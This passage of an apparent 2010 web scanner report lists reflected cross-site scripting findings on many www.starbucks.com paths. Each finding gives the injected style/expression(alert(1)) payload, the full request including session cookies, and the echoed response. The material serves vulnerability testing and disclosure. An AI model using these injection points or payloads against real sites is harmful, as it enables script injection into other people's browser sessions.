Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:20:47 GMT
Connection: close
Content-Length: 38360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us?949e3"style="x:expression(alert(1))"f35557201b0=1"/>
...[SNIP]...

3.6. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb6ed"style%3d"x%3aexpression(alert(1))"7948577bab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb6ed"style="x:expression(alert(1))"7948577bab3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee?eb6ed"style%3d"x%3aexpression(alert(1))"7948577bab3=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:25 GMT
Content-Length: 56826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee?eb6ed"style="x:expression(alert(1))"7948577bab3=1"/>
...[SNIP]...

3.7. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17abe"style%3d"x%3aexpression(alert(1))"ea84b9a66b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17abe"style="x:expression(alert(1))"ea84b9a66b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn?17abe"style%3d"x%3aexpression(alert(1))"ea84b9a66b2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:00:23 GMT
Connection: close
Content-Length: 37678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn?17abe"style="x:expression(alert(1))"ea84b9a66b2=1"/>
...[SNIP]...

3.8. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/clover

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ec4"style%3d"x%3aexpression(alert(1))"ceb4d722147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 20ec4"style="x:expression(alert(1))"ceb4d722147 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn/clover?20ec4"style%3d"x%3aexpression(alert(1))"ceb4d722147=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:04:15 GMT
Connection: close
Content-Length: 39114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn/clover?20ec4"style="x:expression(alert(1))"ceb4d722147=1"/>
...[SNIP]...

3.9. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/flavors-in-your-cup

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5721b"style%3d"x%3aexpression(alert(1))"720e97e12cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5721b"style="x:expression(alert(1))"720e97e12cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn/flavors-in-your-cup?5721b"style%3d"x%3aexpression(alert(1))"720e97e12cf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:03:56 GMT
Connection: close
Content-Length: 43928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn/flavors-in-your-cup?5721b"style="x:expression(alert(1))"720e97e12cf=1"/>
...[SNIP]...

3.10. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84807"style%3d"x%3aexpression(alert(1))"1a579164fdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84807"style="x:expression(alert(1))"1a579164fdd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions?84807"style%3d"x%3aexpression(alert(1))"1a579164fdd=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:39 GMT
Connection: close
Content-Length: 52482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions?84807"style="x:expression(alert(1))"1a579164fdd=1"/>
...[SNIP]...

3.11. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/caramel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72f92"style%3d"x%3aexpression(alert(1))"a4e88aeeae4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72f92"style="x:expression(alert(1))"a4e88aeeae4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/caramel?72f92"style%3d"x%3aexpression(alert(1))"a4e88aeeae4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:26 GMT
Connection: close
Content-Length: 42434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel?72f92"style="x:expression(alert(1))"a4e88aeeae4=1"/>
...[SNIP]...

3.12. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/cinnamon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96717"style%3d"x%3aexpression(alert(1))"9bd61317b0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 96717"style="x:expression(alert(1))"9bd61317b0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/cinnamon?96717"style%3d"x%3aexpression(alert(1))"9bd61317b0b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:59 GMT
Connection: close
Content-Length: 42477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon?96717"style="x:expression(alert(1))"9bd61317b0b=1"/>
...[SNIP]...

3.13. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/savoring

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da712"style%3d"x%3aexpression(alert(1))"153353c2d05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da712"style="x:expression(alert(1))"153353c2d05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/savoring?da712"style%3d"x%3aexpression(alert(1))"153353c2d05=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:58:58 GMT
Connection: close
Content-Length: 41224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring?da712"style="x:expression(alert(1))"153353c2d05=1"/>
...[SNIP]...

3.14. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/vanilla

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b02"style%3d"x%3aexpression(alert(1))"11530d23784 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e0b02"style="x:expression(alert(1))"11530d23784 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/vanilla?e0b02"style%3d"x%3aexpression(alert(1))"11530d23784=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:43 GMT
Connection: close
Content-Length: 42403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla?e0b02"style="x:expression(alert(1))"11530d23784=1"/>
...[SNIP]...

3.15. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c78ef"style%3d"x%3aexpression(alert(1))"30e6886810a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c78ef"style="x:expression(alert(1))"30e6886810a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee?c78ef"style%3d"x%3aexpression(alert(1))"30e6886810a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:03 GMT
Connection: close
Content-Length: 52822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee?c78ef"style="x:expression(alert(1))"30e6886810a=1"/>
...[SNIP]...

3.16. http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c317"style%3d"x%3aexpression(alert(1))"4e1c91bd61f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c317"style="x:expression(alert(1))"4e1c91bd61f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi?1c317"style%3d"x%3aexpression(alert(1))"4e1c91bd61f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:51:31 GMT
Connection: close
Content-Length: 42269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi?1c317"style="x:expression(alert(1))"4e1c91bd61f=1"/>
...[SNIP]...

3.17. http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f782"style%3d"x%3aexpression(alert(1))"945e17cc48d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f782"style="x:expression(alert(1))"945e17cc48d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry?9f782"style%3d"x%3aexpression(alert(1))"945e17cc48d=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:14 GMT
Content-Length: 41929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry?9f782"style="x:expression(alert(1))"945e17cc48d=1"/>
...[SNIP]...

3.18. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6142"style%3d"x%3aexpression(alert(1))"e771ce6760f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6142"style="x:expression(alert(1))"e771ce6760f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?b6142"style%3d"x%3aexpression(alert(1))"e771ce6760f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:14 GMT
Connection: close
Content-Length: 43000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?b6142"style="x:expression(alert(1))"e771ce6760f=1"/>
...[SNIP]...

3.19. http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/nicaragua-corcasan

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2762f"style%3d"x%3aexpression(alert(1))"d1da931e99d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2762f"style="x:expression(alert(1))"d1da931e99d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/nicaragua-corcasan?2762f"style%3d"x%3aexpression(alert(1))"d1da931e99d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
